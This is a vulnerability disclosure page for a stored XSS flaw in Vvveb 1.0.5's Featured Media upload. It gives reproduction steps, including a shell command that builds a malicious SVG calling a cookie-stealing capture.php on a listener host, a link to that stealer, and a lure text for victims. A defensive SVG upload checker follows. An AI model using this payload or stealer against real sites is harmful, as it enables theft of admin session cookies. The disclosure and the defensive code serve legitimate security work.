Submit #628297: Vvveb 1.0.5 Cross Site Scripting

Title: Vvveb 1.0.5 Cross Site Scripting
Description:

The endpoints at [/vadmin123/index.php?module=content/post&type=post] and [/vadmin123/index.php?module=content/posts&type=page] are vulnerable to XSS. An attacker can trigger XSS by uploading a malicious SVG image payload as “Featured Media”. The payload is triggered by opening the image in a new tab; this requires user interaction, but the payload is executed without alarming the user.

Both endpoints are accessible by an editor and can be used to inject malicious XSS to steal cookies of users, other site admins, editors or even super admins.

Reproduce

To reproduce the issue, navigate to any of these endpoints to view posts or pages:

    http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
    http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page

Edit a post or a page (both are very similar):

    http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
    http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page

On the right sidebar, click on “Featured Media” to upload a new image.

Create the following SVG image:

    echo '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300"><rect width="300" height="300" fill="red" /><text x="150" y="250" font-size="12" fill="white" text-anchor="middle" alignment-baseline="middle">Please open the image in a new tab to see it</text><image href="http://127.0.0.1:1718/capture.php" width="300" height="200" /></svg>' > payload.svg

Upload payload.svg and save the post.

To trigger XSS, open the image using its full path:

    http://127.0.0.1/media/payload.svg

When you open it, a request is sent to the following URL:

    http://127.0.0.1:1718/capture.php

capture.php is a cookie stealer that steals cookies of logged-in users. You can download this PHP file from here:

    https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Save it as capture.php and start a PHP server to serve it:

    php -S x.x.x.x:1718

Additionally, SVG images can be configured to show a specific text such as “Open this image in a new tab”, which can lure users into opening the image in a new tab and triggering XSS.
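For defenders, an upload-time check that would reject the SVG from the reproduction steps, given as an added example that is not part of the original submission and is not Vvveb code. The function name audit_svg, the tag list and the data-URI allowlist are assumptions chosen for illustration; BENIGN_SVG and SCRIPT_SVG are constructed samples.

```python
import re
import xml.etree.ElementTree as ET

ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
SAFE_DATA_URI = re.compile(r"^data:image/(png|jpeg|gif);base64,", re.I)

# The SVG from the reproduction steps above, shortened to the relevant elements.
REPORTED_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300">'
                b'<rect width="300" height="300" fill="red" />'
                b'<image href="http://127.0.0.1:1718/capture.php" width="300" height="200" />'
                b'</svg>')
# Constructed samples: a harmless drawing and one carrying inline script.
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><defs><circle id="c" r="5"/></defs><use href="#c"/></svg>'
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="init()"><script>init()</script></svg>'

def local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()

def audit_svg(data):
    """Return reasons to reject an uploaded SVG; an empty list means nothing was flagged."""
    # Only plain UTF-8 is accepted, so the byte-level DTD check below cannot be sidestepped.
    if data[:2] in (b"\xff\xfe", b"\xfe\xff") or b"\x00" in data:
        return ["not UTF-8 encoded"]
    # Refuse DTDs before parsing: no entity expansion, no external entities.
    if re.search(rb"<!\s*(DOCTYPE|ENTITY)", data, re.I):
        return ["DOCTYPE/ENTITY declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if local(root.tag) != "svg":
        findings.append("root element is not <svg>")
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for name, value in el.attrib.items():
            attr, val = local(name), value.strip()
            if attr.startswith("on"):
                findings.append(f"event handler {attr} on <{tag}>")
            elif attr in ("href", "src") and not (val.startswith("#") or SAFE_DATA_URI.match(val)):
                findings.append(f"external reference in {attr} on <{tag}>: {val}")
    return findings

if __name__ == "__main__":
    for label, sample in (("reported", REPORTED_SVG), ("benign", BENIGN_SVG), ("script", SCRIPT_SVG)):
        print(label, audit_svg(sample) or "accepted")
```

A check like this is a reject-on-upload gate. Serving `.svg` files from the media directory with `Content-Disposition: attachment` or a `Content-Security-Policy: sandbox` response header limits what a file that slips through can do when opened directly.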
Source: https://hkohi.ca/vulnerability/7
User: 0xHamy (UID 88518)
Submission: 08/04/2025 18:43 (11 months ago)
Moderation: 08/13/2025 18:34 (9 days later)
Status: Accepted
VulDB entry: 319972 [givanz Vvveb up to 1.0.5 Endpoint post&type=post cross site scripting]
Points: 19